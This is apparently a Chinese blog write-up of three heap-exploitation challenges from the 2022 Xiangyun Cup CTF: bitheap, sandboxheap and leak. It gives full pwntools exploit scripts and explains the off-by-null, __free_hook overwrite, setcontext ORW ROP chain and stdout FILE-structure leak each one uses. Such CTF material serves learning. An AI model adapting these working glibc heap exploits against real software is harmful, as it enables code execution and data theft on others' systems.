2022祥云杯pwn

最新推荐文章于 2022-11-19 00:37:00 发布
最新推荐文章于 2022-11-19 00:37:00 发布
阅读量398 收藏
点赞数 10
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127697299
版权

        

bitheap

off by null漏洞,当时试了试发现可以溢出一位,不过加密函数没有看懂,赛后看了看别人的wp跟着学了一遍。

exp:

from pwn import *
context.log_level='debug'
r=process('./bitheap')
elf=ELF('./bitheap')
libc=ELF('/home/lyp/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6')

def add(index,size):
    r.sendlineafter("Your choice: ",'1')
    r.sendlineafter("Index: ",str(index))
    r.sendlineafter("Size: ",str(size))
def edit(index,content):
    r.sendlineafter("Your choice: ",'2')
    r.sendlineafter("Index: ",str(index))
    r.sendafter("Content: ",content)
def show(index):
    r.sendlineafter("Your choice: ",'3')
    r.sendlineafter("Index: ",str(index))
def delete(index):
    r.sendlineafter("Your choice: ",'4')
    r.sendlineafter("Index: ",str(index))
def int2bin_str(x):
    return bin(x)[2:].zfill(64)[::-1]

add(0,0x80)
add(1,0x18)
add(2,0xf0)
add(3,0x18)

for i in range(7):
    add(i+4,0x80)
for i in range(7):
    delete(i+4)
    add(i+4,0xf0)
for i in range(7):
    delete(i+4)

delete(0)
edit(1,bin(0xffffffff)[2:][::-1]*2*2 + bin(0xb0)[2:].rjust(64,"0")[::-1] + "0")
#delete(1)
delete(2)
delete(1)
add(0,0xb0)
show(0)
leak=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.info("leak->"+hex(leak))
libc_base=leak-0x1a0-0x10-96-libc.sym['__malloc_hook']
log.info("libc_base->"+hex(libc_base))

free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
one_gadget=[0x4f2a5,0x4f302,0x10a2fc]
ogg=one_gadget[0]+libc_base

edit(0,bin(0xffffffff)[2:][::-1]*2*2*8+bin(0xffffffff)[2:][::-1]*2 + bin(0x20)[2:].rjust(64,"0")[::-1] + bin(free_hook).rjust(64,"0")[::-1] )
add(1,0x18)
add(2,0x18)
edit(2,bin(system)[2:].rjust(64,"0")[::-1])
edit(1,bin(0x68732f6e69622f).rjust(64,"0")[::-1])
delete(1)
#gdb.attach(r)
r.interactive()

分析:

add(0,0x80)
add(1,0x18)
add(2,0xf0)
add(3,0x18)

为之后漏洞利用先构造出off by null的三个堆块。

for i in range(7):
    add(i+4,0x80)
for i in range(7):
    delete(i+4)
    add(i+4,0xf0)
for i in range(7):
    delete(i+4)

 此时将0x90和0x100的tcachebin填满,为避免以后off by null时堆块进入tcache。

delete(0)
edit(1,bin(0xffffffff)[2:][::-1]*2*2 + bin(0xb0)[2:].rjust(64,"0")[::-1] + "0")
#delete(1)
delete(2)
delete(1)

利用off by null,先释放0堆块,然后通过改1堆块触发off by null从而将2堆块size的p位置0,并且将prevsize位写成上边两个堆块大小之和,然后释放2堆块发生向上合并形成一个大堆块。

 接着申请从unsortedbin申请0xb0大小的堆块泄露libc

add(0,0xb0)
show(0)
leak=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.info("leak->"+hex(leak))
libc_base=leak-0x1a0-0x10-96-libc.sym['__malloc_hook']
log.info("libc_base->"+hex(libc_base))

free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
one_gadget=[0x4f2a5,0x4f302,0x10a2fc]
ogg=one_gadget[0]+libc_base

 此时观察堆块结构

申请的0xb0覆盖到了下方0x20且位于tcache的堆块,那么我们就可以通过写0xb0的堆块将这个已释放的0x20的指针改为free_hook的位置,然后申请0x20的第一个堆块写入'/bin/sh\x00',再申请0x20的第二个堆块(free_hook)写入system,最后释放堆块get shell。

sandboxheap

二进制文件代码跟bitheap基本一样,就多了一个沙箱,需要用orw读出flag。

其他师傅的exp:

from pwn import *
context.log_level='debug'
r=process('./sandboxheap')
elf=ELF('./sandboxheap')
libc=elf.libc

def info(a,b):
    log.info("\033[0;32;40m"+a+hex(b)+'\033[0m')
def add(index,size):
    r.sendlineafter("Your choice: ",'1')
    r.sendlineafter("Index: ",str(index))
    r.sendlineafter("Size: ",str(size))
def edit(index,content):
    r.sendlineafter("Your choice: ",'2')
    r.sendlineafter("Index: ",str(index))
    r.sendlineafter("Content: ",content)
def show(index):
    r.sendlineafter("Your choice: ",'3')
    r.sendlineafter("Index: ",str(index))
def delete(index):
    r.sendlineafter("Your choice: ",'4')
    r.sendlineafter("Index: ",str(index))
def decrypt(m,n):
    payload=""
    for i in range(n):
        payload += (str(bin(m&0xff)[2:])[::-1].ljust(8,"0"))
        m = m>>8
    if n==6:
        payload+='a'*16
    if n==4:
        payload+='a'*32
    return payload

#-----------------------------leak libc----------------------------#
for i in range(8):#0-7
    add(i,0xa0)
add(8,0x38)
for i in range(7):
    delete(i)
for i in range(7):#0-6
    add(i,0x1f0)
add(9,0x1f0)
for i in range(6):
    delete(i+1)
delete(9)
#-------------------unuse heap->7(0xa0),8(0x38),0(0x1f0)-----------------#
delete(7)
edit(8,'2'*(0x38*8))
edit(8,"1"*(0x30*8)+"aaaa1111")
delete(0)
for i in range(7):
    add(i,0xa0)
add(9,0xa0)
show(9)
leak_libc=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
info("leak_libc->",leak_libc)
libc_base=leak_libc-0x2e0-0x10-96-libc.sym['__malloc_hook']
info("libc_base->",libc_base)

free_hook=libc_base+libc.sym['__free_hook']
write_addr=libc_base+libc.sym['write']
read_addr=libc_base+libc.sym['read']
setcontext=libc_base+libc.sym['setcontext']+53
info("setcontext->",setcontext)
pop_rax=libc_base+0x000000000001b500
pop_rdi=libc_base+0x000000000002164f
pop_rsi=libc_base+0x0000000000023a6a
pop_rdx=libc_base+0x0000000000001b96
syscall=libc_base+0x00000000000E5815
#--------------------------leak heap--------------------#
add(10,0xa0)
delete(0)
delete(8)
show(10)
r.recvuntil('Content: ')
leak_heap=u64(r.recv(6).ljust(8,'\x00'))
info("leak_heap->",leak_heap)
heap_base=leak_heap-0x680
info("heap_base->",heap_base)
#---------------free_hook->setcontext+53-------------------#
edit(10,'1'*0x8*8)
payload=decrypt(free_hook,6)
edit(10,payload+'a'*0x30)
add(0,0xa8)
add(8,0xa0)
add(11,0x1f0)
edit(8,'1'*16*8)
edit(8,decrypt(setcontext,6))
edit(0,decrypt(0x67616c66,4))#heap_base+0x7e0
flag_addr=heap_base+0x7e0
rop=heap_base+0x1620
payload='a'*(0xa0*8)+decrypt(rop+0xb8,6)+decrypt(pop_rdi+1,6)+decrypt(0x67616c66,4)
payload+=decrypt(pop_rdi,6)+decrypt(flag_addr,6)+decrypt(pop_rsi,6)+decrypt(4,6)+decrypt(pop_rax,6)+decrypt(2,6)+decrypt(syscall,6)#open
payload+=decrypt(pop_rdi,6)+decrypt(3,6)+decrypt(pop_rsi,6)+decrypt(flag_addr,6)
payload+=decrypt(pop_rax,6)+decrypt(0,6)+decrypt(pop_rdx,6)+decrypt(0x30,6)+decrypt(syscall,6)#read
payload+=decrypt(pop_rdi,6)+decrypt(1,6)+decrypt(pop_rsi,6)+decrypt(flag_addr,6)
payload+=decrypt(pop_rax,6)+decrypt(1,6)+decrypt(pop_rdx,6)+decrypt(0x30,6)+decrypt(syscall,6)#write
edit(11,payload)
gdb.attach(r)
delete(11)
r.interactive()

 首先还是释放堆块填满tcache,然后这里留下的off by null的三个堆块号是7,8,0。这三个堆块是挨着的。

for i in range(8):#0-7
    add(i,0xa0)
add(8,0x38)
for i in range(7):
    delete(i)
for i in range(7):#0-6
    add(i,0x1f0)
add(9,0x1f0)
for i in range(6):
    delete(i+1)
delete(9)

 

 触发off by null漏洞,泄露libc。

delete(7)
edit(8,'2'*(0x38*8))
edit(8,"1"*(0x30*8)+"aaaa1111")
delete(0)
for i in range(7):
    add(i,0xa0)
add(9,0xa0)
show(9)
leak_libc=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
info("leak_libc->",leak_libc)
libc_base=leak_libc-0x2e0-0x10-96-libc.sym['__malloc_hook']
info("libc_base->",libc_base)

free_hook=libc_base+libc.sym['__free_hook']
write_addr=libc_base+libc.sym['write']
read_addr=libc_base+libc.sym['read']
setcontext=libc_base+libc.sym['setcontext']+53
info("setcontext->",setcontext)
pop_rax=libc_base+0x000000000001b500
pop_rdi=libc_base+0x000000000002164f
pop_rsi=libc_base+0x0000000000023a6a
pop_rdx=libc_base+0x0000000000001b96
syscall=libc_base+0x00000000000E5815

由于此时只是释放了7和0,而8是通过off by null实现合并而释放,但其实并没有释放,所以此时如果通过申请堆块到8的位置上,然后释放掉8,那么通过show申请的堆块就可以打印出堆块地址,为orw创造条件。

add(10,0xa0)
delete(0)
delete(8)
show(10)
r.recvuntil('Content: ')
leak_heap=u64(r.recv(6).ljust(8,'\x00'))
info("leak_heap->",leak_heap)
heap_base=leak_heap-0x680
info("heap_base->",heap_base)

然后通过改10的指针(10和8堆块重叠,相当于改tcachebin里的8)指向freehook。申请两个堆块,第一个堆块(heapbase+0x7e0)写'flag'字符串,第二个堆块(free_hook)写setcontext+53,再申请一个堆块写我们的orw的rop链。这里申请11(heap_base+0x1620)

edit(10,'1'*0x8*8)
payload=decrypt(free_hook,6)
edit(10,payload+'a'*0x30)
add(0,0xa8)
add(8,0xa0)
add(11,0x1f0)
edit(8,'1'*16*8)
edit(8,decrypt(setcontext,6))
edit(0,decrypt(0x67616c66,4))#heap_base+0x7e0
gdb.attach(r)
flag_addr=heap_base+0x7e0
rop=heap_base+0x1620

 

接下来往堆块11里写我们的orw的rop链。

payload='a'*(0xa0*8)+decrypt(rop+0xb8,6)+decrypt(pop_rdi+1,6)+decrypt(0x67616c66,4)
#payload+=decrypt(pop_rdi,6)+decrypt(0xff,6)+decrypt(pop_rax,6)+decrypt(10000,6)+decrypt(syscall,6)#no use
payload+=decrypt(pop_rdi,6)+decrypt(flag_addr,6)+decrypt(pop_rsi,6)+decrypt(4,6)+decrypt(pop_rax,6)+decrypt(2,6)+decrypt(syscall,6)#open
payload+=decrypt(pop_rdi,6)+decrypt(3,6)+decrypt(pop_rsi,6)+decrypt(flag_addr,6)
payload+=decrypt(pop_rax,6)+decrypt(0,6)+decrypt(pop_rdx,6)+decrypt(0x30,6)+decrypt(syscall,6)#read
payload+=decrypt(pop_rdi,6)+decrypt(1,6)+decrypt(pop_rsi,6)+decrypt(flag_addr,6)
payload+=decrypt(pop_rax,6)+decrypt(1,6)+decrypt(pop_rdx,6)+decrypt(0x30,6)+decrypt(syscall,6)#write
edit(11,payload)

 

 解释一下这个orw链:首先在libc文件里找到setcontext函数。

 

 重点看下边这一堆mov,通过rdi加上一个偏移控制了很多寄存器,这里主要看rsp和rcx,(rsp控制程序执行流,rcx被赋值后紧跟一个push rcx指令),如果我们将rcx写一个ret的话,那么程序执行完返回时会正好执行我们的rop链。

payload='a'*(0xa0*8)+decrypt(rop+0xb8,6)+decrypt(pop_rdi+1,6)

这里前0xa0填0,然后rdi+0xa0写rop+0xb8的地址,这里正好指向orw的open开始处,rdi+0xa8写为ret。调试看一下:

这里进入

 进入

 看到我们成功进入setcontext

 成功返回到我们的orw链

至此就能打印出flag了。

leak

通过分析程序,发现两个关于加密解密的函数好像没什么用,free函数里存在一个uaf漏洞,指针未指0,并且程序一开始就将flag读入了申请的一个堆块中,由于这个题没有查(show),所以没有办法泄露libc改hook,也没有办法泄露堆块地址,看别人wp学了一种新的uaf的利用方法,醍醐灌顶。

利用方法:

通过堆块重叠利用unsortedbin指向main_arena指针,修改后指向_IO_2_1_stdout_,然后申请之后,把 stdout 的 flag 设置为 0xfbad1800,之后再exit的时候,就会将 IO_write_base 到IO_write_ptr之间的可读内容带出来,我们构造IO_write_base为堆块起始地址,IO_write_ptr为0x55ffffffffff(保证在flag堆块之后即可)

利用的技术:fastbin reverse into tcache

关于fastbin链入tcachebin的关键代码。

fastbin->fd=tcache[size]->fd
fastbin->bk=&tcache[size]
tcache[size]->fd=fastbin

 看到这里有一个行为是 fastbin->bk=&tcache[size]。在 2.27的1.4版本以前(不包括)是没有这句话的。所以这里我们可以任意写一个堆地址。

exp:

from pwn import *
while True:
    try:
        context.log_level='debug'
        context.arch='amd64'
        r=process('./leak')
        libc=ELF('/home/lyp/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6')

        def info(a,b):
            log.info("\033[0;33;40m"+a+hex(b)+'\033[0m')
        def add(index,size):
            r.sendlineafter("Your choice: ",'1')
            r.sendlineafter("Index: ",str(index))
            r.sendlineafter("Size: ",str(size))
        def edit(index,content):
            r.sendlineafter("Your choice: ",'2')
            r.sendlineafter("Index: ",str(index))
            r.sendafter("Content: ",content)
        def delete(index):
            r.sendlineafter("Your choice: ",'3')
            r.sendlineafter("Index: ",str(index))

        add(0,0x30)
        add(1,0x500)
        add(3,0x30)
        add(4,0x10)
        add(5,0x10)
        add(11,0x40)

        edit(1,flat(0,0,0,0x4f1,0,0x4e1))
        edit(0, flat(0,0,0,0x41))
        delete(0)
        delete(3)
        edit(3,p8(0xc0))
        add(12,0x30)
        add(2,0x30)

        edit(2,flat(0,0,0,0x51))
        delete(1)

        edit(2,flat(0,0,0,0x21,0,0))
        for i in [4,5,4,5,4,5,4]:
            delete(i)
            edit(i,p64(0))
        delete(1)#fastbin
        edit(2,flat(0,0,0,0x511))
        delete(1)

        lyp=0x9
        edit(2,flat(0,0,0,0x51)+p8(0x60)+p8(lyp*16+7))
        add(13,0x40)
        add(14,0x40)
        edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))

        edit(2,flat(0,0,0,0x21)+p8(0x68)+p8(lyp*16+7))
        add(15, 0x10)
        add(6, 0x10)
        #gdb.attach(r)
        r.sendlineafter(b"Your choice: ", b'6')
        r.recv(0x250)
        print(r.recv(0x100))
        #gdb.attach(r)
        r.interactive()
    except:
        pass

 分析:

add(0,0x30)
add(1,0x500)
add(3,0x30)
add(4,0x10)
add(5,0x10)
add(11,0x40)

创建堆块,以后用得上。第一个堆块是flag存放的位置,从第二个开始使我们add的堆块 

然后编辑堆块0,在堆块0里边伪造一个大小为0x30的堆块2,然后释放0和3,通过修改3的指针使其指向伪造的堆块2,从而我们可以通过编辑堆块2来改堆块1的大小。

        edit(1,flat(0,0,0,0x4f1,0,0x4e1))
        edit(0, flat(0,0,0,0x41))
        delete(0)
        delete(3)
        edit(3,p8(0xc0))
        add(12,0x30)
        add(2,0x30)

可以发现此时fd指针已经被修改。

 

 接着我们就可以通过编辑堆块2来任意篡改堆块1的大小了。这里需要将其分别放入size=0x50的tcachebin和size=0x20的fastbin和size=0x511的unsortedbin中。

        edit(2,flat(0,0,0,0x51))
        delete(1)

        edit(2,flat(0,0,0,0x21,0,0))
        for i in [4,5,4,5,4,5,4]:
            delete(i)
            edit(i,p64(0))
        delete(1)#fastbin

这里需要爆破一个字节的_IO_2_1_stdout_的地址,最后一个字节一定是\x60,倒数第二个字节是\x?7,我们需要任意填入问号中一个值,有一定几率撞到_IO_2_1_stdout_,第一次修改是让其链入tcachebin中,然后申请堆块14来修改IO_write_ptr的值为0x5fffffffffff。第二次修改是让其链入fastbin中,然后触发fastbin reverse into tcache,由于这里的fastbin链接的是_IO_2_1_stdout_+0x8,也就是IO_read_ptr的位置,那么fastbin->bk=&tcache[size]这句话修改的就是IO_read_ptr+0x18也就是IO_write_base所在位置。

即修改IO_write_base为第一个chunk(size=0x250的头)的地址,这样就可以在exit退出时打印存有flag的堆内容了。

        lyp=0x9
        edit(2,flat(0,0,0,0x51)+p8(0x60)+p8(lyp*16+7))
        add(13,0x40)
        add(14,0x40)
        edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))

        edit(2,flat(0,0,0,0x21)+p8(0x68)+p8(lyp*16+7))
        add(15, 0x10)
        add(6, 0x10)

最后循环程序爆破出flag。

 

 

KingKi1L3r
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn题堆利用的一些姿势 -- setcontext
lifanxin的博客
06-27 3335
setcontext概述setcontext介绍setcontext具体操作setcontext实例总结 pwn题堆利用的一些姿势 – malloc_hook pwn题堆利用的一些姿势 – free_hook pwn题堆利用的一些姿势 – IO_FILE 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2418
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程比赛的pwn题,题目链接如下:2021-鹏程-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 915
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
祥云2022 pwn - leak
z1r0的博客
11-08 419
wjh师傅的思路是利用botcake的方法,将unsortedbin和tcache重叠,使得unsortedbin的fd落到tcache的fd,再修改最后两字节,进行libc上地址的申请,可以申请到global_max_fast和stdout,这里由于地址随机化肯定是需要爆破的。算好size之后,delete掉,此时目标地址就会指向堆地址,从而实现了向地址中写入堆地址,因为flag在堆地址里,所以就可以泄露出flag,exp就用的wjh师傅的。当时比赛没有做出来,光顾着泄露libc地址去了。
【八芒星计划】 ORW
carol2358的博客
09-01 3947
本篇用来记录ORW,ORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
2022柏鹭pwn复现
最新发布
m0_63437215的博客
11-19 1352
2022柏鹭pwn
高校战“疫”网络安全分享赛pwn部分wp
starssgo的博客
03-11 847
高校战“疫”网络安全分享赛pwn部分wp 博客地址 easyheap 刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。 漏洞在申请的大小大于0x400时,return。这时ptr[i]没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。 # -*- coding: utf-8 -* from pwn import *from LibcSea...
DASCTF 7月部分pwn
starssgo的博客
07-25 1408
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
Pwntools的context设置与shellcode
半岛铁盒的博客
02-27 4205
文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。 一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con
pwn】orw
weixin_43960998的博客
06-19 1761
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
BUUCTF pwn 四月刷题
coco的博客
04-07 802
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5138
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
setcontext
qq_51474381的博客
04-11 1262
1.setcontext是什么? 如上所示的代码段,从setcontext+53开始,这段汇编可用来实现对寄存器的赋值操作,但要控制好rdi与rcx。 rdi用来确定从什么地方取值赋给寄存器。 rcx先push再ret,实际上是对rip的控制,这里要确保rcx指向内存可读,不然会报错。 2.利用: 利用pwntools带的SigreturnFrame(),可以方便的构造出setcontext执行时对应的调用区域,实现对寄存器的控制,从而实现函数调用或orw调用。 ...
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4236
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
[ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal报错的解决办法(亲测有效!)
weixin_36711901的博客
12-27 5038
一、问题描述 在通过ssh连接服务器,在命令行界面进行pwntools的实验中,在调用gdb进行debug时会报这样一个错 [ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal,如下图所示 其中部分实验代码如下: from pwn import * sh = pr...
SSCTF Final PWN
weixin_30273763的博客
06-14 102
比赛过去了两个月了,抽出时间,将当时的PWN给总结一下。 和线上塞的题的背景一样,只不过洞不一样了。Checksec一样,发现各种防护措施都开了。 程序模拟了简单的堆的管理,以及cookie的保护机制。漏洞是一个内存未初始化漏洞,就是申请内存的时候,上一次的内存还未清0,这个时候通过构造特定输入可以使用内存中仍有的内容。这样的话,容易造成数组的越界读写。就是通过数组...
祥云2022 pwn - bitheap
z1r0的博客
11-01 414
需要注意的是d60这个函数,经过调试之后可以得知传入的内容需要使用二进制来表示,所以就写了一个decode。2.27下的off-by-one,其实也可以看成off-by-null。接下来就是板子直接套 2.27的off-by-null。
[祥云 2022] bitheap,sandboxheap复现
weixin_52640415的博客
11-04 359
sandbox setcontext ->mprotect ->shellcode32
2022强网pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值